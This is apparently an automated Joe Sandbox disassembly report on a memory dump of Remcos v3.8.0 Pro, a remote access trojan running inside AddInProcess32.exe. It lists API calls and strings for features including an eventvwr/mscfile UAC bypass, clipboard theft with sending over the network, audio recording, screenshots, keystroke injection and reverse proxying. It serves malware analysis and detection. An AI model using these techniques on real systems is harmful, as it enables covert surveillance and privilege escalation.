Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-4172179172
Opcode ID: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
Opcode Fuzzy Hash: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE

Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
Opcode Fuzzy Hash: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5

Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445645

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00445651
_free.LIBCMT ref: 0044565C
_free.LIBCMT ref: 00445667
_free.LIBCMT ref: 00445672
_free.LIBCMT ref: 0044567D
_free.LIBCMT ref: 00445688
_free.LIBCMT ref: 00445693
_free.LIBCMT ref: 0044569E
_free.LIBCMT ref: 004456AC

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88

Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00417F6F
GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
Sleep.KERNEL32(000003E8), ref: 004180B3
GetLocalTime.KERNEL32(?), ref: 004180BB
Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00418050, 00418071, 004180DF
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00418055

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-3790400642
Opcode ID: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
Opcode Fuzzy Hash: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799

Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107

Strings

acos, xrefs: 0045327F
sqrt, xrefs: 0045328B
pow, xrefs: 004531EB, 00453297, 004532AA
log, xrefs: 004531AD, 004531B9
log10, xrefs: 00453151, 004531A1
asin, xrefs: 00453273
exp, xrefs: 004531CC, 0045322E

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D

Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Sleep.KERNEL32(00000064), ref: 00415A46
DeleteFileW.KERNEL32(00000000), ref: 00415A7A

Strings

temp, xrefs: 004159CA
dxdiag, xrefs: 00415A0F
\sysinfo.txt, xrefs: 004159C5
/t , xrefs: 004159F9
open, xrefs: 00415A14

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 36d359686f8d258eec0ac53b404e0d21dfbbc9de5a162bb8c05c016e87e645cb
Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
Opcode Fuzzy Hash: 36d359686f8d258eec0ac53b404e0d21dfbbc9de5a162bb8c05c016e87e645cb
Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99

Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00000001), ref: 0041AA5D
ShowWindow.USER32(00000000,00000000), ref: 0041AA76

Strings

CONOUT$, xrefs: 0041AA89
3.8.0 Pro, xrefs: 0041AAC2
* Remcos v, xrefs: 0041AAB4
--------------------------, xrefs: 0041AAA6
--------------------------, xrefs: 0041AADE
* BreakingSecurity.net, xrefs: 0041AAD0

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocConsoleShowWindow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
API String ID: 4118500197-4025029772
Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D

Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B

Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
TranslateMessage.USER32(?), ref: 0041B29E
DispatchMessageA.USER32(?), ref: 0041B2A8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5

Strings

Remcos, xrefs: 0041B26D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68

Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dee208c16fd6e6a71a697de3b175f4e390e38276f2012422441a095a82cae68d
Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
Opcode Fuzzy Hash: dee208c16fd6e6a71a697de3b175f4e390e38276f2012422441a095a82cae68d
Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B

Function 00452DBB Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
__dosmaperr.LIBCMT ref: 00452ED6
GetFileType.KERNEL32(00000000), ref: 00452EE2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
__dosmaperr.LIBCMT ref: 00452EF5
CloseHandle.KERNEL32(00000000), ref: 00452F15
CloseHandle.KERNEL32(00000000), ref: 0045305F
GetLastError.KERNEL32 ref: 00453091
__dosmaperr.LIBCMT ref: 00453098

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A

Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
__alloca_probe_16.LIBCMT ref: 004510CA
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
__alloca_probe_16.LIBCMT ref: 00451174
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
__freea.LIBCMT ref: 004511E3
__freea.LIBCMT ref: 004511EF

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 77818321e3ce56ea0e71bb7bca8220fb6369df6bc1e17647591189b9ba8744e1
Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
Opcode Fuzzy Hash: 77818321e3ce56ea0e71bb7bca8220fb6369df6bc1e17647591189b9ba8744e1
Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768

Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

_memcmp.LIBVCRUNTIME ref: 00442935
_free.LIBCMT ref: 004429A6
_free.LIBCMT ref: 004429BF
_free.LIBCMT ref: 004429F1
_free.LIBCMT ref: 004429FA
_free.LIBCMT ref: 00442A06

Strings

C, xrefs: 004427F3

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 1b68fb9e24b66cfa6b20be242c75466d086ab93edfb681ab48de3257ce38a64d
Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
Opcode Fuzzy Hash: 1b68fb9e24b66cfa6b20be242c75466d086ab93edfb681ab48de3257ce38a64d
Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44

Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 0041349C
tcp, xrefs: 004134C9

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A

Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040FF79
inet_ntoa.WS2_32(?), ref: 00410014

Strings

StartReverse, xrefs: 004100E4
StopForward, xrefs: 004100F5
StartForward, xrefs: 004100D8
StopReverse, xrefs: 00410106
GetDirectListeningPort, xrefs: 00410117

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 7aad75cc0eebb2e9d3ac8b012f70ba9c1af19a6d2a5a7bc0ab2fb84483b27ce6
Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
Opcode Fuzzy Hash: 7aad75cc0eebb2e9d3ac8b012f70ba9c1af19a6d2a5a7bc0ab2fb84483b27ce6
Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF

Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36

Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00471E90,00404C29,00000000,?,?,?,00471E90,?), ref: 00404B85
Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3

Strings

.part, xrefs: 00406A1A

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
Opcode Fuzzy Hash: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A

Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
__alloca_probe_16.LIBCMT ref: 00447056
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
__alloca_probe_16.LIBCMT ref: 0044713B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
__freea.LIBCMT ref: 004471AB

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

__freea.LIBCMT ref: 004471B4
__freea.LIBCMT ref: 004471D9

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 4a3c7fd5df8aec1f106920e086c0c8b502c59cd20239ccd34f4dcb85e5a0006e
Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
Opcode Fuzzy Hash: 4a3c7fd5df8aec1f106920e086c0c8b502c59cd20239ccd34f4dcb85e5a0006e
Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8

Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7

Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414F41
EmptyClipboard.USER32 ref: 00414F4F
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
Opcode Fuzzy Hash: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A

Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
__fassign.LIBCMT ref: 00447814
__fassign.LIBCMT ref: 0044782F
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69

Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D30

Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9

waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F

Strings

.wav, xrefs: 00401D49
%Y-%m-%d %H.%M, xrefs: 00401D21

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
Opcode Fuzzy Hash: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E

Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
